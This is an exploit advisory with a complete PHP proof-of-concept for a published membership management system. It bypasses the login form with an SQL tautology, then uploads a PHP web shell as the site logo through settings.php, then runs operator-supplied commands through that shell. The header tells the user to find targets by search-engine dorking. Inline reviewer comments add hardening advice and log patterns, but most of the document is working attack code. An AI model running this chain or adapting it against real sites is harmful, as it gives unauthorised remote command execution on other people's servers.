`=============================================================================================================================================
| # Title : Membership Management System version 1.0 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://codeastro.com/membership-management-system-in-php-with-source-code/ |
=============================================================================================================================================
poc :
[+] Dorking in Google or other search engine.
[+] This payload injects PHP code that contains a back door.
[+] Line 20 Set your Target.
[+] save payload as poc.php
[+] usage from cmd : C:\www\test>php 1.php
[+] payload :
<?php
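/**
 * Build a pseudo-random string of $size characters drawn from $chars.
 *
 * The pool is $chars repeated often enough to hold $size characters, shuffled
 * with str_shuffle(), then truncated. str_shuffle() is not a cryptographically
 * secure source, so the result is unsuitable for tokens or secrets.
 *
 * @param int    $size  Number of characters wanted; values below 1 give ''.
 * @param string $chars Alphabet to draw from; an empty alphabet gives ''.
 * @return string String of exactly $size characters (or '' as described above).
 */
function randomGen($size = 8, $chars = 'abcdefghijklmnopqrstuvwxyz') {
    $alphabetLength = strlen($chars);
    // Guard the division below and str_repeat()'s non-negative count requirement.
    if ($size < 1 || $alphabetLength === 0) {
        return '';
    }
    $pool = str_shuffle(str_repeat($chars, (int) ceil($size / $alphabetLength)));
    // Take from offset 0: the original started at offset 1 and returned one
    // character too few whenever $size was an exact multiple of strlen($chars).
    return substr($pool, 0, $size);
}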
// Reviewer summary (defensive reading of this script): it sends a login POST whose
// 'email' field carries an SQL tautology, takes the first Set-Cookie value from the
// response, then POSTs a multipart form to settings.php whose "logo" part is a PHP
// file, and finally requests that file under uploads/ with a ?cmd= parameter.
// The two weaknesses this implies in the target (a login query built from raw input;
// an upload handler that stores and serves executable files) are inferred from the
// requests below, not shown on this page — confirm against the application source.
// Hardening that addresses them: prepared statements for the login query, an
// allow-list of image types/extensions with server-generated file names, and no
// PHP execution in the uploads directory.
// Log patterns worth alerting on: a multipart POST to settings.php whose filename
// ends in .php, followed by a GET to uploads/<8 lowercase letters>.php?cmd=...
// Name for the uploaded file: randomGen()'s default output plus ".php"
$shellFile = randomGen() . ".php";
// Login form fields; the 'email' value closes the quoted string and appends an
// always-true condition followed by '#' (presumably a MySQL comment marker)
// NOTE(review): "[email protected]" looks like an address masked by the hosting
// page's e-mail obfuscation rather than the author's original literal — confirm
$payload = [
'email' => "[email protected]' or 0=0 #", // Adjust based on the target
'password' => 'a',
'login' => ''
];
// One cURL handle is reused for both the login and the settings request
$session = curl_init();
// Base URL of the application instance under test (loopback address as published)
$urlBase = "http://127.0.0.1/Membership/";
// Login endpoint
$url = $urlBase . "index.php";
echo "=== Executing SQL Injection ===\n";
// Configure the login POST (form-encoded body built from $payload)
curl_setopt($session, CURLOPT_URL, $url);
curl_setopt($session, CURLOPT_POST, 1);
curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($session, CURLOPT_RETURNTRANSFER, true);
curl_setopt($session, CURLOPT_HEADER, true); // Include header in output
// Redirects are not followed, so the headers parsed below belong to the login response itself
curl_setopt($session, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($session, CURLOPT_VERBOSE, true); // For debugging
// Send the login request
$response = curl_exec($session);
// Split the raw response into header block and body using the reported header size
$header_size = curl_getinfo($session, CURLINFO_HEADER_SIZE);
$headers = substr($response, 0, $header_size);
$body = substr($response, $header_size);
// Collect the name=value part of every Set-Cookie header; only the first one is kept
preg_match_all('/^Set-Cookie:\s*([^;]+)/mi', $headers, $matches);
$cookie = '';
if (isset($matches[1][0])) {
$cookie = $matches[1][0];
}
// Print headers for debugging
echo "=== Response Headers ===\n";
echo $headers;
// NOTE(review): the presence of a Set-Cookie header is the only check made here;
// the script does not confirm that the session is actually authenticated
if ($cookie) {
echo "=== Authenticated admin cookie: " . $cookie . " ===\n";
} else {
echo "Set-Cookie header not found in the response.\n";
exit();
}
// Second request goes to the settings page, which receives the "logo" file field
$url = $urlBase . "settings.php";
// Read one line from standard input; it is only used in the final request's query string
echo "Enter the command to execute: ";
$cmd_input = trim(fgets(STDIN));
// Content of the uploaded file: PHP that passes the 'cmd' request parameter to system().
// A file with this behaviour inside an uploads directory is an indicator of compromise.
$php_code = "<?php if(isset(\$_REQUEST['cmd'])){\$cmd = \$_REQUEST['cmd']; system(\$cmd); die; }?>";
// Hand-built multipart/form-data body ($body is reused; the login response body is discarded).
// Parts sent: systemName, currency, logo (the file) and updateSettings.
$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));
$body = "--$boundary\r\n";
$body .= 'Content-Disposition: form-data; name="systemName"' . "\r\n\r\n";
$body .= "Membership System\r\n";
$body .= "--$boundary\r\n";
$body .= 'Content-Disposition: form-data; name="currency"' . "\r\n\r\n";
$body .= "$\r\n";
$body .= "--$boundary\r\n";
// The "logo" part declares a .php filename and a PHP content type; a server-side
// check on either value would be a place to reject this request
$body .= 'Content-Disposition: form-data; name="logo"; filename="' . $shellFile . '"' . "\r\n";
$body .= 'Content-Type: application/x-php' . "\r\n\r\n";
$body .= $php_code . "\r\n";
$body .= "--$boundary\r\n";
$body .= 'Content-Disposition: form-data; name="updateSettings"' . "\r\n\r\n";
$body .= "\r\n";
$body .= "--$boundary--\r\n";
// Reconfigure the same handle for the settings POST; the cookie captured above is
// sent as an explicit Cookie header
curl_setopt($session, CURLOPT_URL, $url);
curl_setopt($session, CURLOPT_POST, 1);
curl_setopt($session, CURLOPT_POSTFIELDS, $body);
curl_setopt($session, CURLOPT_HTTPHEADER, [
'Content-Type: multipart/form-data; boundary=' . $boundary,
'Cookie: ' . $cookie
]);
echo "=== Logging in and uploading shell " . $shellFile . " ===\n";
// Send the settings request; the response is stored but never inspected, so the
// script does not verify that the file was accepted
$response = curl_exec($session);
// Close cURL session
curl_close($session);
// Request the uploaded file under uploads/ with the URL-encoded input as ?cmd=
$requestUrl = $urlBase . "uploads/" . $shellFile . "?cmd=" . urlencode($cmd_input);
echo "=== Issuing the command: " . $requestUrl . " ===\n";
echo "=== CURL OUTPUT ===\n";
// Despite the banner above, this fetch uses file_get_contents(), not cURL
echo file_get_contents($requestUrl);
?>
[+]
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
`